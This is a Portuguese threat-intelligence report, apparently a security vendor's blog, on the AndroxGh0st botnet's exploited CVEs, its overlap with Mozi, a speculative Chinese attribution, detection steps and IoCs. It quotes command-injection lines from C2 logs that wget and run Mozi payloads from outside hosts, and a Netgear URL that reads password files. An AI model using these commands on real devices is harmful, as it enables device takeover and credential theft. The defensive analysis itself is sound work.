Sumário executivo

A equipe de pesquisa de ameaças da CloudSEK identificou desenvolvimentos significativos na botnet AndroxGh0st, revelando a exploração de várias vulnerabilidades e uma possível integração operacional com a botnet Mozi. Ativo desde janeiro de 2024, o Androxgh0st é conhecido por ter como alvo servidores web, mas registros recentes de comando e controle (C2) indicam que ele também está implantando cargas úteis do Mozi com foco em IoT. A CISA divulgou um comunicado sobre o botnet no início deste ano. A botnet, ativa desde janeiro de 2024, tem como alvo uma ampla gama de tecnologias, incluindo Cisco ASA, Atlassian JIRA e várias estruturas PHP, permitindo acesso não autorizado e execução remota de código. Isso descreve claramente o aumento da atividade dos operadores de botnets, pois agora eles estão se concentrando em uma ampla gama de vulnerabilidades de aplicativos da web para obter acesso inicial, além dos 3 CVEs relatados. mais cedo pela CISA. O CloudSEK recomenda a correção imediata dessas vulnerabilidades para mitigar os riscos associados à botnet AndroxGH0st, conhecida pela exploração sistemática e pelo acesso persistente por backdoor.

Análise e atribuição

Plano de fundo

• CloudSEKda plataforma contextual de risco digital de IA XV Vigília descobriu que o botnet Androxgh0st vem explorando mais de 20 vulnerabilidades desde pelo menos agosto de 2024.
• A CISA lançou uma segurança consultivo em janeiro de 2024, aumentando a conscientização sobre a expansão da botnet AndroxGH0ST usando os 3 vetores de acesso inicial listados abaixo:

1. Explorando a vulnerabilidade do PHP (CVE-2017-9841) no PHPUnit: Os agentes de ameaças exploram uma vulnerabilidade na estrutura do PHPUnit atacando pastas /vendor expostas, usando especificamente a página eval-stdin.php para executar código PHP remotamente e fazer upload de arquivos maliciosos, estabelecendo acesso secreto a sites comprometidos.
2. Visando o .env e a chave do aplicativo do Laravel Framework (CVE-2018-15133): Androxgh0st procura sites com arquivos.env do Laravel expostos para roubar credenciais. Se a chave do aplicativo estiver acessível, ela permite a execução de código PHP criptografado por meio de tokens XSRF, permitindo o upload de arquivos e o acesso remoto.
3. Percurso de caminho do servidor Web Apache (CVE-2021-41773): Ao ter como alvo as versões 2.4.49 e 2.4.50 do Apache, os agentes de ameaças usam a travessia de caminhos para acessar arquivos fora do diretório raiz, explorando servidores configurados incorretamente para executar código arbitrário e potencialmente obter dados ou credenciais confidenciais.

Sobre o Mozi Botnet

O botnet Mozi se espalhou principalmente pela China, Índia e Albânia. O botnet tinha como alvo os roteadores Netgear, Dasan, D-Link e servidores MVPower DVR Jaws. Em 2021, os autores da botnet Mozi foram presos pela polícia chinesa. Os criadores do botnet Mozi, ou polícia chinesa, ao forçarem a cooperação dos criadores, distribuíram uma atualização que acabou com a capacidade dos agentes do Mozi Botnet de se conectarem ao mundo exterior, deixando apenas uma pequena fração dos bots em funcionamento em pé.

Durante nossa investigação, conseguimos adquirir os registros do servidor de comando e controle da botnet AndroxGh0st. Nossa análise esclarece as vulnerabilidades que estão sendo exploradas pela botnet e os TTPs comuns com o Mozi.

Análise

• Durante nossas verificações de rotina em busca de infraestrutura maliciosa, o TRIAD da CloudSEK encontrou servidores de comando e controle sendo usados pela botnet AndroxGH0st.

‍

‍

• Como podemos ver, os servidores estão armazenando as solicitações POST e GET do agente de botnet ao longo do tempo.

‍

‍

• O botnet Androxgh0st é conhecido por enviar solicitações POST contendo várias sequências de caracteres peculiares.

‍

‍

Agora que confirmamos que esses servidores estão se comunicando com os agentes da botnet, vamos dar uma olhada no tipo de solicitações da Web registradas nesses servidores para entender as vulnerabilidades dos aplicativos da Web exploradas pela botnet.

‍

Vulnerabilidades exploradas pelo botnet Androxgh0st

O TRIAD da CloudSEK revelou uma série de vulnerabilidades que estão sendo exploradas pela botnet AndroxGh0st para obter acesso inicial.

‍

‍

1. Vulnerabilidade XSS da página de login do Cisco ASA WebVPN (CVE-2014-2120): A vulnerabilidade de script entre sites (XSS) na página de login WebVPN no software Cisco Adaptive Security Appliance (ASA) permite que atacantes remotos injetem scripts web ou HTML arbitrários por meio de um parâmetro não especificado.

‍

‍

‍

Formulário de upload de arquivo:

• O código cria inicialmente um formulário HTML que permite o upload de um arquivo (<input type='file' name='a'>).
• Quando um arquivo é carregado, ele é salvo no servidor com seu nome de arquivo original usando a função PHP move_uploaded_file (), permitindo que o invasor carregue arquivos arbitrários no servidor.

Anexa código aos arquivos PHP:

• Se o URL contiver um parâmetro bak, um segundo script será ativado. Esse script procura no diretório atual qualquer arquivo com a extensão.php.
• Para cada arquivo.php, ele anexa o conteúdo de uma variável da solicitação POST ($_POST ['file']) ao arquivo. Isso basicamente permite que o invasor insira código PHP arbitrário em qualquer arquivo PHP no diretório.

Esse método de anexação pode ser usado para espalhar código malicioso em vários arquivos PHP no servidor, estabelecendo uma presença mais persistente ou bloqueando ainda mais o aplicativo.

‍

2. Arquivo remoto limitado lido no Jira Software Server (CVE-2021-26086): Essa vulnerabilidade permite que atacantes remotos leiam arquivos específicos por meio de uma vulnerabilidade de passagem de caminho no endpoint /WEB-INF/web.xml. As versões afetadas são anteriores à versão 8.5.14, da versão 8.6.0 antes da 8.13.6 e da versão 8.14.0 antes da 8.16.1.

‍

‍

3. Inclusão de arquivo local do mapa Metabase GeoJSON Versões x.40.0-x.40.4 (CVE-2021-41277): Existe uma vulnerabilidade de inclusão de arquivos locais no Metabase devido a um problema de segurança presente no suporte a mapas GeoJSON que leva a uma vulnerabilidade de inclusão de arquivos locais. Um atacante remoto não autenticado pode explorar isso, por meio de uma solicitação HTTP GET especialmente criada, para baixar arquivos arbitrários com privilégios de root e examinar variáveis de ambiente.

‍

‍

4. A vulnerabilidade de desvio do Sophos Authentication leva ao RCE (CVE-2022-1040): Um problema de desvio de autenticação que afeta o firewall Portal do usuário e Administrador da Web interfaces da web. O desvio permite que um atacante remoto e não autenticado execute código arbitrário.

‍

‍

5. Upload de arquivo arbitrário não autenticado do Oracle E-Business Suite (EBS) (CVE-2022-21587): Uma vulnerabilidade de upload de arquivo arbitrário não autenticado no Oracle Web Applications Desktop Integrator, fornecida com as versões 12.2.3 até 12.2.11 do Oracle EBS, pode ser explorada para obter execução remota de código como usuário oracle.

‍

‍

6. OptiLink ONT1GEW GPON 2.1.11_X101 Compilação 1127.190306 - Execução remota de código (autenticada):

‍

‍

7. Injeção de argumento CGI em PHP: (CVE-2024-4577): Um problema de injeção de argumentos no PHP-CGI.

‍

‍

‍

Não é comum que botnets acrescentem uma string no final de uma solicitação da web, nesse caso,”PWN_IT”, que indica uma ação acionada.

• Ao injetar esses argumentos, o atacante está tentando fazer com que o PHP execute seu arquivo PWN_IT. Se o arquivo estiver localizado no servidor e contiver código PHP malicioso, isso poderá levar à execução remota do código, permitindo que o invasor controle o servidor.
• Ao anexar ou prefixar seu arquivo a cada solicitação de PHP, o invasor garante que seu arquivo malicioso seja executado toda vez que um script PHP é executado, o que permite que ele mantenha a persistência e potencialmente evite a detecção.

‍

‍8. Injeção de comando não autenticada TP-Link (CVE-2023-1389): Uma falha de injeção de comando com classificação CVSS 8.8 no firmware TP-Link Archer AX21 permite a execução de comandos não autenticados como root por meio do parâmetro country em /cgi-bin/luci; stok=/locale.

‍

‍

• O arquivo.sh baixado usando o RCE é o que facilita a exploração.
• Ele baixa arquivos de um servidor remoto, os torna executáveis, os executa com o argumento 'selfrep' e, em seguida, exclui os arquivos baixados. Esse processo é repetido para vários arquivos com nomes diferentes.
• O script baixa e executa arquivos do servidor remoto em http://154.216.17[.]31. É evidente que ele tenta baixar e executar executáveis ('tarm', 'tarm5', 'tarm6', 'tarm7', 'tmips', 'tmpsl', 'tsh4', 'tspc', 'tppc', 'tarc'). Os arquivos baixados são executáveis e executados com o argumento 'selfrep'. Após a execução, os arquivos baixados são excluídos.
• Ele usa o comando '/bin/busybox' para executar comandos. Isso sugere que o script provavelmente está sendo executado em um sistema com um ambiente busybox, o que confirma o uso em roteadores TP-Link.

‍

9. Vulnerabilidade do GeoServer RCE (CVE-2024-36401): As versões do GeoServer anteriores a 2.25.1, 2.24.3 e 2.23.5 permitem a execução remota de código não autenticado ao manipular incorretamente os parâmetros de solicitação OGC, permitindo a avaliação insegura de expressões XPath.

‍

‍‍

10. Plugin WordPress Background Image Cropper v1.2 - Execução remota de código:

‍

‍

11. Ataques de força bruta no Wordpress: O botnet percorre nomes de usuário administrativos comuns e usa um padrão de senha consistente. O URL de destino é redirecionado para /wp-admin/, que é o painel de administração de back-end para sites WordPress. Se a autenticação for bem-sucedida, ele terá acesso aos controles e configurações essenciais do site.

‍

‍

12. Execução de comandos não autenticados em dispositivos Netgear DGN: O servidor web incorporado ignora as verificações de autenticação de alguns URLs que contêm a substring "currentsetting.htm”. <target-ip-address>Como exemplo, o URL a seguir pode ser acessado até mesmo por atacantes não autenticados:http:///setup.cgi? currentSetting.htm=1.Então, a página "setup.cgi" pode ser abusada para executar comandos arbitrários. Como exemplo, para ler o arquivo local /www/.htpasswd (contendo a senha em texto não criptografado para o usuário “admin”), um invasor pode acessar a seguinte URL:

http://<target-ip-address>/setup.cgi? next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤ tsetting.htm=1

‍Um invasor pode substituir o comando pelo comando que deseja executar.

Agora, ao examinar os registros do servidor de comando e controle, notamos uma solicitação GET que estava explorando essa vulnerabilidade antiga. Também podemos ver quais são os comandos injetados.

‍

‍

Comandos injetados:

cmd=rm -rf /tmp/ *; wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear

A sequência de comandos é a seguinte:

• rm -rf /tmp/ *: Isso exclui todos os arquivos no diretório /tmp, para limpar todos os dados antigos e garantir armazenamento suficiente para o malware baixado.
• wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear: Isso usa o wget para baixar um arquivo malicioso chamado Mozi.m de um servidor externo (200.124.241 [.] 140:44999) e o salva como /tmp/netgear.
• sh netgear: Isso executa o arquivo baixado como um script de shell. O Mozi.m provavelmente contém código malicioso. Uma vez executado, o dispositivo alvo se torna parte da botnet.

O arquivo baixado, Mozi.m, está associado ao Botnet Mozi. O Mozi é um botnet conhecido que visa principalmente dispositivos de IoT, explorando vulnerabilidades para adicioná-los a uma rede de dispositivos comprometidos.

‍‍

13. Execução de comandos não autenticados em roteadores GPON (CVE-2018-10561, CVE-2018-10562): 

CVE-2018-10561: Os roteadores domésticos GPON permitem que a autenticação seja ignorada por meio de anexação? imagens para URLs que normalmente exigem login, como /menu.html? images/ ou /gponform/DIAG_FORM? images/, permitindo o acesso não autorizado ao dispositivo.

CVE-2018-10562: Os roteadores Dasan GPON são vulneráveis à injeção de comando por meio do parâmetro dest_host em uma solicitação diag_action=ping para o URI /GPONform/diag_form. O roteador armazena os resultados do ping em /tmp, que podem ser acessados revisitando /diag.html, permitindo que os comandos sejam executados e sua saída recuperada.

‍

‍

14. Spring Cloud Gateway < 3.0.7 e < 3.1.1 Injeção de código (CVE-2022-22947) - Os aplicativos ficam vulneráveis a um ataque de injeção de código quando o endpoint do Gateway Actuator está ativado, exposto e inseguro.

‍

‍

15. ZenTao CMS - Injeção de SQL (CNVD-2022-42853) - O Zen Tao tem uma vulnerabilidade de injeção de SQL. Os atacantes podem explorar a vulnerabilidade para obter informações confidenciais do banco de dados.

‍

‍

16. Vulnerabilidade de desvio de autenticação e execução remota de código do AJ-Report (CNVD-2024-15077) - A plataforma pode executar comandos no valor correspondente do parâmetro ValidationRules por meio do método post, obter permissões do servidor e fazer login no plano de fundo de gerenciamento para assumir a tela grande. Um invasor remoto não autenticado pode comprometer o servidor para roubar informações confidenciais, instalar ransomware ou acessar a rede interna.

‍

‍

17. eYouMail - Execução remota de código (CNVD-2021-26422) - O eYouMail é suscetível a uma vulnerabilidade de execução remota de código.

‍

‍

18. Leadsec VPN - Leitura arbitrária de arquivos (CNVD-2021-64035) - Uma vulnerabilidade de vazamento de informações na VPN SSL da Beijing Wangyuxingyun Information Technology Co., Ltd., pode ser explorada por um invasor para ler informações confidenciais de arquivos arbitrários localizados no sistema de arquivos do servidor.

‍

‍

19. Vulnerabilidade de leitura arbitrária de arquivos do EduSOHO - Há uma vulnerabilidade de leitura arbitrária não autorizada de arquivos na interface de estatísticas do curso e da sala de aula do sistema de educação e treinamento. Por meio dessa vulnerabilidade, um invasor pode ler o conteúdo do arquivo config/parameters.yml e obter o valor secreto e a senha da conta do banco de dados salvos no arquivo. Informações confidenciais. Depois de obter o valor secreto, os agentes de ameaças podem usá-lo ainda mais. É importante notar que essa tecnologia é usada predominantemente pelos chineses.

‍

‍‍

20. Execução remota de código UFIDA NC BeanShell (CNVD-2021-30167) - Um invasor pode explorar essa vulnerabilidade para executar código remotamente sem autorização. É importante notar que essa tecnologia é usada predominantemente pelos chineses.

‍

‍

21. Injeção de SQL do OA E-Cology LoginSSO.jsp (CNVD-2021-33202) - e-cology é um sistema de escritório OA (usado predominantemente na China) produzido especialmente para grandes e médias empresas que suporta o trabalho de escritório simultâneo em terminais PC, móveis e WeChat. Um invasor pode explorar essa vulnerabilidade de injeção de SQL para obter informações confidenciais.

‍

‍

22. Vulnerabilidade arbitrária de leitura de arquivos do ShopXO Download (CNVD-2021-15822) - O Shopxo é um sistema de comércio eletrônico de código aberto de nível corporativo de código aberto usado predominantemente na China. O Shopxo tem uma vulnerabilidade arbitrária de leitura de arquivos que um invasor pode usar para obter informações confidenciais.

‍

‍

23. Weaver OA XmlRpcServlet - Leitura arbitrária de arquivo (CNVD-2022-43245) - O e-office é uma plataforma de escritório móvel colaborativo padrão usada predominantemente na China. Ltd. e-office tem uma vulnerabilidade arbitrária de leitura de arquivos, que pode ser explorada por atacantes para obter informações confidenciais.

‍

‍

24. Senha fraca do Ruijie Smartweb - O sistema de gerenciamento Ruijie smartweb (usado predominantemente na China) abre a vulnerabilidade da conta de convidado por padrão, e o invasor pode fazer login em segundo plano por meio da vulnerabilidade a novos ataques (convidado/convidado).

‍

‍

25. Vulnerabilidade de injeção de SQL do HCM em Hongjing (CNVD-2023-08743) - Existe uma vulnerabilidade de injeção de SQL no Sistema de Gerenciamento de Recursos Humanos de Hongjing, usando a qual os invasores podem obter informações confidenciais do banco de dados.

‍

‍

26. E-Cology V9 - Injeção de SQL (CNVD-2023-12632) - O Ecology9 é um sistema de escritório colaborativo criado pela Panmicro para organizações de médio e grande porte. É usado predominantemente na China. Há uma vulnerabilidade de injeção de SQL no Panmicro ecology9, que pode ser explorada por invasores para obter informações confidenciais do banco de dados.

‍

‍

27. Ruckus Wireless Admin até 10.4 (CVE-2023-25717) - O Ruckus Wireless Admin até 10.4 permite a execução remota de código por meio de uma solicitação HTTP GET não autenticada. O Androxgh0st verifica se o dispositivo de rede está sendo executado com as credenciais padrão e, em caso afirmativo, ele envia um ping para o endereço IP 45.221.98 [.] 117.

‍

‍

possibilidades:

Mozi Payload como um componente do Androxgh0st:

• É possível que o Androxgh0st tenha integrado totalmente a carga útil do Mozi como um módulo em sua própria arquitetura de botnet. Nesse caso, o Androxgh0st não está apenas colaborando com o Mozi, mas incorporando as funcionalidades específicas do Mozi (por exemplo, mecanismos de infecção e propagação da IoT) em seu conjunto padrão de operações.
• Isso significaria que o Androxgh0st se expandiu para aproveitar o poder de propagação do Mozi para infectar mais dispositivos de IoT, usando as cargas úteis do Mozi para atingir metas que, de outra forma, exigiriam rotinas de infecção separadas.

Infraestrutura de comando unificada:

• Se as duas botnets estiverem usando a mesma infraestrutura de comando, isso indica um alto nível de integração operacional, possivelmente implicando que tanto o Androxgh0st quanto o Mozi estão sob o controle do mesmo grupo cibercriminoso. Essa infraestrutura compartilhada simplificaria o controle sobre uma gama mais ampla de dispositivos, aumentando a eficácia e a eficiência de suas operações combinadas de botnet.

A TRIAD recomenda que as organizações corrijam essas vulnerabilidades que estão sendo exploradas na natureza o mais rápido possível para reduzir a probabilidade de serem comprometidas pelo botnet Androxgh0st/Mozi.

‍

‍

Ambas as botnets compartilham táticas de infecção envolvendo injeção de comandos, preenchimento de credenciais, inclusão de arquivos e exploração de CVEs focados em IoT.

Estatísticas globais de infecção

O número de dispositivos afetados pela botnet Androxgh0st está aumentando a cada dia. No momento em que escrevo este blog, mais de 500 dispositivos foram infectados.

‍

‍

Atribuição

Vamos examinar mais de perto a exploração do Ruckus Wireless Admin (CVE-2023-25717) pela botnet.

‍

‍

Uma pesquisa reversa de IP no endereço IP revela dois domínios:

• 1xbw [.] com
• Mgn4 [.] com

Ao analisar o histórico de DNS passivo do mgn4 [.] com, vemos que o domínio foi alternado entre vários endereços IP a partir da mesma máscara de sub-rede desde julho de 2023.

‍

‍

Isso indica que o grupo de ameaças estava envolvido em atividades maliciosas usando o nome de domínio pelo menos desde julho de 2023. Ao inspecionar os arquivos de comunicação com esse domínio, encontramos um Excel malicioso com o nome do arquivo contendo caracteres mandarim. Essa isca de phishing, vista pela primeira vez na natureza em julho de 2023, foi usada pelos agentes da ameaça para atacar um hospital em Hong Kong. O nome do arquivo se traduz em “Hospital Kwai Chung DO16191.xlsx”. (md5:039987db7dc1dea01547e0f3066f8d5d)

‍

‍

Voltando à vulnerabilidade de injeção de comando do PHP, notamos uma string incomum na carga útil. Conforme explicado anteriormente, ao acrescentar e acrescentar, o invasor garante que seu arquivo malicioso seja executado toda vez que um script PHP é executado. A string “PWN_IT” provavelmente é um indicador/sinalizador usado como mecanismo de persistência, e podemos verificar com alta confiança que é algo que os próprios atores da ameaça nomearam.

‍

‍

Uma simples busca nos levou a uma “equipe CTF” chamada”pwn_it”, liderado pelo usuário “ChenSem”.

‍

‍

Esses CTFs são hospedados por “Kanxue”. Kanxue é uma comunidade chinesa de “desenvolvedores”, focada em “pesquisa de segurança” e “engenharia reversa” de PCs, dispositivos móveis e inteligentes. Podemos ver o logotipo do Conselho de Estado da China em seu site.

‍

‍

Agora, isso definitivamente despertou nosso interesse, pois não é incomum que CTFs mantidos na China hackeiem alvos do mundo real. Recente exemplos mostram que os organizadores do CTF geralmente precisam que os alunos assinem um documento concordando com vários termos incomuns, com o objetivo de manter essas operações secretas. Veja o que observamos:

‍

1. O último CTF jogado por “pwn_it” em Kanxue foi em 2020, embora “ChenSem” pareça ser um jogador pesado do CTF, indicado por sua pontuação de 501. Curiosamente, foi na mesma época em que o mundo viu uma maior atividade do Mozi Botnet na natureza.

‍

‍

2. O CTF hospedado por Kanxue em 2024 começou em agosto, mais ou menos na mesma época em que a exploração do Androxgh0st TP-Link foi observada na natureza.

‍

‍

3. “Pwn_it” também foi usado como uma função no código-fonte em várias ocasiões. Notamos blogs de “V1ct0r”, que escreveu mais de 90 artigos sobre pesquisa de segurança e engenharia reversa.

‍

‍

Seu portfólio on-line está hospedado no Github (gdufs-king.github [.] io), com o mandarim como idioma padrão. O GDUFS se refere à Universidade de Estudos Estrangeiros de Guangdong, o que implica que o autor provavelmente estudou em uma universidade chinesa. Embora não haja uma relação direta estabelecida entre essa equipe do CTF e o botnet, certamente observamos que o uso da string “pwn_it” em solicitações de malware e web é popular nessa equipe do CTF.

‍

Conclusão

• Vimos um aumento nas tecnologias de segmentação do Androxgh0st que são usadas nos ecossistemas chineses. Isso ocorre depois que o “interruptor de interrupção” foi supostamente usado pelas autoridades chinesas em 2021. Isso aponta para um aumento vigilância em massa esforços dos atores que se sobrepõem aos interesses do estado.
• Observamos que os agentes de ameaças que operam a botnet tinham como alvo um hospital de Hong Kong em julho de 2023, o que coincide com a vitimologia de APTs chineses, como o APT41 e o Tonto Team.
• Com base nas informações disponíveis, podemos verificar com pouca confiança que o botnet AndroxGh0st está sendo operado por agentes de ameaças chineses que são movidos por interesses semelhantes aos do estado chinês, ou seja, vigilância em massa. Como vimos nos vazamentos do i-soon, o mercado de APT está repleto de muitas empresas privadas diferentes que podem fornecer “serviços de pentesting e formação de equipes vermelhas” ao estado.
• Estamos observando uma tendência em que os agentes de ameaças atualizam regularmente seu arsenal com as explorações mais recentes que podem ser facilmente exploradas. Podemos esperar que o AndroxGh0st explore pelo menos 75% mais vulnerabilidades de aplicativos da web até meados de 2025 do que está explorando agora.

‍

Verificando sinais de comprometimento

1. Revise os registros do HTTP e do servidor Web

• Verifique se há solicitações suspeitas: Procure solicitações HTTP GET ou POST que incluam comandos incomuns ou suspeitos, como wget, curl ou parâmetros de injeção de comando, como cmd=rm ou cmd=wget. Esses são sinais comuns de tentativa de injeção de comando pelo Androxgh0st.

Exemplos de entradas de registro a serem observadas:
OBTER /cgi-bin/admin.cgi? command=ping&ip=127.0.0.1; wget+ http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx

POST /wp-login.php HTTP/1.1 log=admin&pwd=passnext%40123456

• Verifique se há tentativas de login incomuns: Procure repetidas tentativas fracassadas de login, indicando atividade de força bruta em páginas de login como /wp-login.php, /admin_login ou /cgi-bin/login.cgi. Eles podem ter como alvo credenciais padrão ou senhas fracas.

2. Monitore os processos do sistema em busca de atividades inesperadas

• Identifique processos suspeitos: Use comandos como ps aux ou top para procurar processos inesperados em execução em locais incomuns (por exemplo, /tmp, /var/tmp ou /dev/shm), o que é típico das cargas de botnet.

Androxgh0st pode executar comandos como:
/tmp/androx

• Inspecione as entradas do Crontab e os scripts de inicialização: O Androxgh0st geralmente tenta a persistência modificando arquivos crontab ou scripts de inicialização. Use os comandos a seguir para verificar se há entradas suspeitas:
  crontab -l

cat /etc/rc.local

cat /etc/cron.d/ *

3. Examine arquivos suspeitos em diretórios temporários

• Inspecione os diretórios /tmp, /var/tmp e /dev/shm: As cargas e scripts do Androxgh0st geralmente são baixados e executados a partir desses diretórios. Procure arquivos com nomes incomuns ou alterações recentes nesses locais:
  ls -la/tmp

ls -la /var/tmp

• Verifique as permissões de arquivo e os arquivos executáveis: Normalmente, os arquivos nesses diretórios não devem ser executáveis. Use find para localizar arquivos executáveis nesses diretórios:
  encontre /tmp -type f -perm /111

4. Analise conexões de rede e tráfego

• Monitore conexões de saída com IPs ou domínios maliciosos conhecidos: O Androxgh0st pode estabelecer conexões com seu servidor de comando e controle (C2). Use ferramentas como netstat ou ss para identificar conexões de rede ativas:
  netstat -antp | grep ESTABELECIDO
• Procure conexões de saída incomuns em portas incomuns (por exemplo, portas com números altos) ou em IPs externos que você não reconhece.
• Verifique se há padrões de tráfego excessivos ou incomuns: Os dispositivos infectados pelo Androxgh0st podem exibir tráfego incomum, especialmente se estiverem participando de uma botnet. Monitore o tráfego em busca de sinais de:algum texto
  • Pesquisas repetidas de DNS para domínios suspeitos.
  • Altos volumes de tráfego de saída que podem indicar participação em atividades de DDoS.

5. Revise as configurações de segurança para ver se há alterações

• Verifique se há alterações inesperadas nas configurações do firewall e do roteador: O Androxgh0st pode tentar abrir portas adicionais ou modificar as regras do firewall. Revise as regras de firewall e as configurações do roteador para ver se há modificações inesperadas.
• Inspecione a configuração SSH em busca de pontos fracos ou chaves não autorizadas: Se Androxgh0st usou força bruta SSH para obter acesso, verifique se nenhuma nova chave SSH foi adicionada a ~/.ssh/authorized_keys.

Verifique:
cat ~/.ssh/authorized_keys

6. Verifique se há vulnerabilidades conhecidas e aplique patches

• Identifique serviços e aplicativos vulneráveis: O Androxgh0st geralmente explora vulnerabilidades conhecidas em servidores web, roteadores e dispositivos de IoT. Use scanners de superfície de ataque contínuo para detectar quaisquer serviços ou aplicativos não corrigidos.
• Atualize o firmware e o software regularmente: Certifique-se de que todos os dispositivos, especialmente dispositivos e roteadores de IoT, estejam executando as versões de firmware mais recentes, pois o AndroxGH0ST tem como alvo CVEs não corrigidos.

7. Use ferramentas de detecção de endpoints

• Execute o software de detecção e resposta de terminais (EDR): As ferramentas de EDR podem ajudar a identificar comportamentos incomuns, processos não autorizados e arquivos suspeitos que podem indicar infecção por Androxgh0st.
• Realize uma verificação de integridade do arquivo: Use ferramentas que possam detectar alterações em arquivos críticos do sistema, configurações de inicialização ou arquivos do servidor web.

8. Verifique os registros em busca de sinais de mecanismos de persistência

• Procure os arquivos de configuração modificados: Analise os arquivos de configuração para ver se há comandos injetados que reativariam o botnet na reinicialização. Isso inclui arquivos como /etc/rc.local, .bashrc ou qualquer script de inicialização personalizado.

Audite os registros do sistema para detectar padrões de atividades maliciosas: Procure padrões em auth.log, syslog ou registros de aplicativos que possam indicar a atividade do Androxgh0st, incluindo tentativas inesperadas de login root ou comandos executados por contas de usuário do servidor web.

‍

Atividade e classificação do ator de ameaças

‍

‍

Referências

• *Fonte de inteligência e confiabilidade da informação - Wikipedia
• ^#Protocolo de semáforo - Wikipedia
• Outras fontes

‍

Apêndice

Indicadores

Registrador de solicitações e remetente de comandos - Androxgh0st

• 165,22.184 [.] 66
• 45,55,104 [.] 59
• Api [.] next [.] eventsrealm [.] com (Eventsrealm é uma plataforma agregadora de eventos baseada na Jamaica)

‍

Exploração do roteador TP Link - Servidores de download

• 45,202,35 [.] 24
• 154,216,17 [.] 31

‍

Exploração do Geoserver - Servidores de download

• 206,189,109 [.] 146
• 149,88,44 [.] 159

‍

Exploração do roteador Netgear - Servidor de download

• 200.124,241 [.] 140

‍

Exploração do roteador GPON - Servidor de download

• 117,215,206 [.] 216

‍

Administrador sem fio da Ruckus (CVE-2023-25717)

• 45,221,98 [.] 117

‍

Hashes de arquivo - AndroxGh0st TP-Link Exploitation (md5)

• 2403a89ab4ffec6d864ac0a7a225e99a
• d9553ca3d837f261f8dfda9950978a0a
• c8340927faaf9dccabb84a849f448e92
• a2021755d4d55c39ada0b4abc0c8bcf5
• c8340927faaf9dccabb84a849f448e92
• db2a59a1fd789d62858dfc4f436822d7
• dd5e7a153bebb8270cf0e7ce53e05d9c
• f75061ac31f8b67ddcd5644f9570e29b
• 45b5c4bff7499603a37d5a665b5b4ca3
• 6f8a79918c78280aec401778564e3345
• e3e6926fdee074adaa48b4627644fccb
• abab0da6685a8eb739027aee4a5c4eaa
• 2938986310675fa79e01af965f4ace4f
• a6609478016c84aa235cd8b3047223eb
• 3cb30d37cdfe949ac1ff3e33705f09e3
• 0564f83ada149b63a8928ff7591389f3
• 3d48dfd97f2b77417410500606b2ced6

‍

Hashes de arquivo - AndroxGH0ST Geoserver Exploitation (md5)

• f2af8db568f135cd9a788b7caff4d517
• 74f85c38ff44ff3b85124caf555cec27
• de86cb78023ce013f3b2b5e618b61401
• 6f5a16332cb0b8fc787f1b1d30f5857a
• 2e599db6456fb778f8bc8d28837d5a45